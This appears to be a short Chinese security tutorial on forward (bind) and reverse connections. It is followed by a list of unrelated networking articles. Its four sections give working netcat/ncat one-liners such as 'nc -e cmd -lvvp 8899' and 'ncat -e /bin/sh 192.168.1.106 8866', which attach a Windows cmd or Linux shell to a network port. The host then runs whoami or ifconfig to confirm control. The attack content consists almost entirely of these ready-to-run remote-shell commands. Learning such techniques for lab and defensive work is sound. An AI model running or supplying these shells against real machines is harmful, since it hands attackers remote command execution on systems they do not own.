2023网络安全 -- 正向连接与反向连接

简介: 2023网络安全 -- 正向连接与反向连接

一、正向连接,Linux服务器主动控制windows服务器

1、上传nc到windows服务器上运行

2、以管理员身份运行cmd

3、执行下面命令,监听任意来自8899端口的数据,等待服务器来连接

nc -e cmd -lvvp 8899

4、Linux服务器执行如下命令,ip地址为windows服务器的地址

ncat 192.168.1.188 8899

5、whoami查看当前主机名称,已获取windows服务器权限

6、此时windows服务器也会获取相关信息

二、正向连接,windows服务器主动控制Linux服务器

1、Linux服务器运行下面命令绑定端口

ncat -e /bin/sh -lvvp 8899

2、windows服务器去连接Linux服务器,

nc 192.168.1.108 8899

3、成功执行Linux相关命令,说明已经可控制Linux服务器

三、反向连接,windows服务器控制Linux服务器

1、windows服务器监听8866端口

nc.exe -lvvp 8866

2、Linux服务器主动连接windows服务器ip和端口

ncat -e /bin/sh 192.168.1.106 8866

3、windows服务器上执行ifconfig命令,成功获取Linux服务器相关信息

四、反向连接,Linux服务器控制服务器windows

1、Linux服务器开启端口监听

ncat -lvvp 8899

2、windows服务器主动连接Linux服务器

nc.exe -e cmd 192.168.1.108 8899

3、Linux服务器直接获取权限

目录
相关文章
|
19天前
|
Ubuntu
虚拟机Ubuntu连接不了网络的解决方法
虚拟机Ubuntu连接不了网络的解决方法
|
30天前
|
Shell Linux C语言
【Shell 命令集合 网络通讯 】Linux 关闭PPP(Point-to-Point Protocol)连接 ppp-off命令 使用指南
【Shell 命令集合 网络通讯 】Linux 关闭PPP(Point-to-Point Protocol)连接 ppp-off命令 使用指南
41 1
|
30天前
|
监控 网络协议 Linux
【Shell 命令集合 网络通讯 】Linux 显示网络 连接、路由表和网络接口信息 netstat命令 使用指南
【Shell 命令集合 网络通讯 】Linux 显示网络 连接、路由表和网络接口信息 netstat命令 使用指南
54 1
|
2月前
|
存储 网络协议 Linux
《网络是怎么样连接的》读书笔记 - WEB服务端请求和响应(五)
《网络是怎么样连接的》读书笔记 - WEB服务端请求和响应(五)
36 0
|
4天前
|
运维 安全 Cloud Native
安全访问服务边缘(SASE):网络新时代的安全与连接解决方案
SASE(安全访问服务边缘)是一种云基安全模型,结合了网络功能和安全策略,由Gartner在2019年提出。它强调身份驱动的私有网络、云原生架构和全面边缘支持,旨在解决传统WAN和安全方案的局限性,如高延迟和分散管理。SASE通过降低IT成本、提升安全响应和网络性能,应对数据分散、风险控制和访问速度等问题,适用于移动办公、多分支办公等场景。随着网络安全挑战的增加,SASE将在企业的数字化转型中扮演关键角色。
|
23天前
|
缓存 网络协议 数据库连接
【底层服务/编程功底系列】「网络通信体系」深入探索和分析TCP协议的运输连接管理的核心原理和技术要点
【底层服务/编程功底系列】「网络通信体系」深入探索和分析TCP协议的运输连接管理的核心原理和技术要点
21 0
|
27天前
|
机器学习/深度学习 自然语言处理 PyTorch
【PyTorch实战演练】基于全连接网络构建RNN并生成人名
【PyTorch实战演练】基于全连接网络构建RNN并生成人名
23 0
|
30天前
|
监控 Shell Linux
【Shell 命令集合 网络通讯 】Linux 拨号连接 dip命令 使用指南
【Shell 命令集合 网络通讯 】Linux 拨号连接 dip命令 使用指南
36 0
|
30天前
|
Shell Linux C语言
【Shell 命令集合 网络通讯 】Linux 建立串行连接 cu命令 使用指南
【Shell 命令集合 网络通讯 】Linux 建立串行连接 cu命令 使用指南
28 0
|
1月前
|
安全 关系型数据库 应用服务中间件
连接rds设置网络权限
连接阿里云RDS需关注:1) 设置白名单,允许特定IP访问;2) 选择合适网络类型,如VPC或经典网络;3) 确保VPC内路由与安全组规则正确;4) 同VPC内可使用内网地址连接;5) 可启用SSL/TLS加密增强安全性。记得遵循最小权限原则,确保数据库安全。不同服务商操作可能有差异,但基本流程相似。
22 9